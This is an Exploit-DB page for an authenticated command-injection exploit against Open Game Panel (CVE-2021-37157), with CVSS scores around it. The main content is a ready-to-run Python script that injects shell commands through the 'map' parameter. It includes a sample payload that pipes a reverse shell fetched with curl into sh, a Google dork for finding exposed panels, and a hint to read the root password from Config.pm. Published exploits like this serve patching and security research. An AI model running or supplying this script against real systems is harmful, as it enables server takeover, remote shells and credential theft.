Lucene search

K
exploitdbPreyEDB-ID:50373
HistoryOct 04, 2021 - 12:00 a.m.

Open Game Panel - Remote Code Execution (RCE) (Authenticated)

2021-10-0400:00:00
prey
www.exploit-db.com
343
open game panel
remote code execution
authenticated
google dork
exploit
vendor homepage
software link
version
tested on
centos linux
injection
system commands
counter-strike server
authentication
patch
cve-2021-37157

CVSS2

9

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

8.9

Confidence

High

EPSS

0.002

Percentile

53.7%

# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intext:"Open Game Panel 2021"
# Date: 08/14/2021
# Exploit Author: prey
# Vendor Homepage: https://www.opengamepanel.org/
# Software Link: https://github.com/OpenGamePanel/OGP-Website
# Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)
# Tested on: CentOS Linux 5.4.102

#Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command=
 betwen ';', the user needs to be authenticated for this.


import requests

banner = """
@
@                                                     @@&    @@@@@/
@                                                      @&   #@@@@@&       .=
,/%@#
@                                                     @@@@@@@@@@@@@((%@@@@*
@                                                     #@@@@@@@@@@@@@@@*%@,
@                                                     @@@@@@@@@@@@@@&@@@@
@                                                    &@@@@@@@@@/   &@@@.
@                                                    @@@@@@@@@(
@                                                    @@@@@@@@@@@@@&*
@                                                     &@@@@@@@@@@@@@@@@%
@                                                        ,&@@@@@@@@@@@@@
@                                                          %@@@@@@@.
@                                              .%@@@@@@@@% @@@@@@
@                                          @@@@@#       .&@@@@#
@            (@@@@@@@@@@@.             .@@@&               @@%
@       .@@@@@,         #@@@@@*      #@@@                   @@@@@
@     @@@&                   &@@@.  @@@
@  ,@@@                         @@@@@@
@ @@@                            %@@@,
@&@@                              @@@,
@@@@
@@@@

 *@@@@@# @@  *@@  %@  @@@  @@      @@@@@/  @@@   @@@       ,@@@   ,@(    .@=
%
 *@/  @@ .@/ @(@  @@  @@@( @@         ,@(  @@@* @#@@       @@(@   ,@(    .@=
%
 *@@@@@@  @@ @ &&.@(  @@ @.@@       @@@@   @@.@(@ @@      (@. @@  ,@(    .@=
%
 *@/      %@(@  @@@   @@ *@@@          @@  @@ @@. @@      @@@@@@, ,@(    .@=
%
 *@/       @@*  @@@   @@  %@@      @@@@@*  @@     @@     &@    @@ ,@@@@@ .@=
@@@@

##You can get mod_id and home_id on your game panel URL when you are logged

"""
print(banner)

target = input("Target url:  (eg: https://panel.example.org)\n")
opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")
mod_id = input("Mod_id value: (eg: 2437)\n")
home_id = input("Home_id value: (eg: 3737)\n")
server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")
command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")

url = target + "/home.php?m=gamemanager&p=game_monitor"
cookies = {"opengamepanel_web": opengamepanel_web}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"}
try:
    requests.post(url, headers=headers, cookies=cookies, data=data)
except:
    print("Something went wrong, check your inputs or try manually exploiting the map parameter")
print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")

CVSS2

9

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

8.9

Confidence

High

EPSS

0.002

Percentile

53.7%